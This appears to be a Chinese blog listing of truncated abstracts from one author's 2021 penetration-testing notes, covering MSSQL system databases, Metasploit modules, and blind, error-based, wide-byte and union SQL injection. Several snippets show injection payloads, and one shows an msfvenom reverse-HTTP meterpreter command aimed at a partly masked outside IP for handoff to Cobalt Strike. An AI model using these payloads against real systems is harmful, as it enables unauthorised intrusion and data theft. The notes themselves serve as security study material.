摘要: MSSQL 视图可以随意删除,而表的删除会导致数据丢失 4个系统数据库,分别是master数据库、model数据库、tempdb数据库、msdb数据库是整个mssql的核心 master数据库(重要):控制mssql所有方面。 master这个数据库中包括所有的配置信息,用户登录信息、当前服务器运行 阅读全文
posted @ 2021-09-08 21:04 PatrickStar88888888 阅读(269) 评论(0) 推荐(0) 编辑
摘要: if(length(database())>1,seelp(5),1) 双字节编码 set character_set_client=gbk 连续两个字节,都符合gbk取值范围时会自动解析为一个汉字 第一个(81-FE)第二个(40-FE) 白盒审计 看编码格式是否为GBK格式 是否使用了preg_ 阅读全文
posted @ 2021-09-03 22:50 PatrickStar88888888 阅读(44) 评论(0) 推荐(0) 编辑
摘要: if(参数1,参数2,参数3) 参数1:判断条件,参数2:条件为真返回的结果,参数3:条件为假返回的结果 判断数据库长度大于10>>> ?id=1' and if(length(database())>10,true,false) -- - 结果没有显示内容说明判断错误 利用二分法原则推断出来是8> 阅读全文
posted @ 2021-09-02 17:34 PatrickStar88888888 阅读(31) 评论(0) 推荐(0) 编辑
摘要: 函数extractvalue(参数1,参数2) 使用条件:mysql版本5.1以上 有长度限制32位 参数1:XML文档,参数2:XPAT语句 用法: extractvalue(1,concat(0x7e,(select user()),0x7e)) ?id=1' and extractvalue( 阅读全文
posted @ 2021-08-31 21:55 PatrickStar88888888 阅读(255) 评论(0) 推荐(0) 编辑
摘要: 流程: 大致流程,msfvenom生成木马->目标机运行木马->msf监听到会话->转移到CS 开始: 先让服务端的CS上线 cs客户端连接cs服务端 cs设置监听 生成木马 msfvenom -p windows/x64/meterpreter_reverse_http lhost=104.xx. 阅读全文
posted @ 2021-08-31 17:24 PatrickStar88888888 阅读(109) 评论(0) 推荐(0) 编辑
摘要: MSF共7个模块: exploits:漏洞利用模块,漏洞利用是攻击者利用服务器的漏洞进行攻击的一种行为,其中包含了 主流漏洞的攻击代码 auxiliary:辅助模块,主要用来执行扫描,嗅探,指纹识别等,算是信息搜集的内容 post:后渗透模块,在取得目标系统远程控制权后,可进行一系列获取敏感信息,跳 阅读全文
posted @ 2021-08-21 16:44 PatrickStar88888888 阅读(100) 评论(0) 推荐(0) 编辑
摘要: MYSQL联合注入 SQL注入存在的条件: 1、具备与数据库交互的条件。 2、用户端可以控制输入内容。 3、没有对用户的输入内容做一定程度的过滤。 根据请求方式分类: 1、GET方式请求注入:常见产生位置url。 2、Post方式请求注入:常见产生位置post包的请求实体。 根据注入点参数方式分类: 1、数字型:sel 阅读全文
posted @ 2021-08-14 13:56 PatrickStar88888888 阅读(149) 评论(0) 推荐(0) 编辑